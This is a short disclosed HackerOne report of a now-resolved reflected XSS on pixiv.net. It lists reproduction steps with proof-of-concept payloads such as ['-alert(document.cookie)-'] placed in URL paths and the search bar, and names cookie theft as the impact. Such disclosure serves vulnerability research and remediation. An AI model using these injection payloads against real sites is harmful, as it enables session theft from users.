XSS reflected on [https://www.pixiv.net]

Disclosed: 2020-12-17 03:33:46 By bcobain23 To pixiv
Medium
Vulnerability Details
## Summary: I found a xss reflected on https://www.pixiv.com URL and in the search bottom from Chrome IOS 13.1 ## Steps To Reproduce: 1. In the URL https://www.pixiv.net/en/%5B'-alert(document.cookie)-'%5D Add Payload ['-confirm(3)-'] 1. In the URL https://www.pixiv.net/en/%5B'-alert(document.cookie)-'%5D Add ['-alert(document.cookie)-'] 1. In the Search Bar Add ['-confirm(3)-'] and the URL is https://www.pixiv.net/en/tags/%5B'-confirm(3)-'%5D#discover ## Impact Steal Cookie
Actions
View on HackerOne
Report Stats
  • Report ID: 766633
  • State: Closed
  • Substate: resolved
  • Upvotes: 136
Share this report